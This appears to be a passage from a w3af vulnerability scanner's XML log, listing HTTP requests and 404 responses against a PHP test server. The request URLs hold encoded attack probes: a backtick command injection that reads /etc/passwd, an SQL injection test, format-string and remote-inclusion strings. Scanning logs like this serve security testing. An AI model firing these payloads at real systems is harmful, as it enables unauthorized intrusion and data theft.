                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="313">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="319">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="322">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/CAokkELj HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about CAokkELj has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='CAokkELj'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="744">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/59%27+AND+%2759%27%3D%2760 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 59%27+AND+%2759%27%3D%2760 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='59%27+AND+%2759%27%3D%2760'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="334">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="335">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
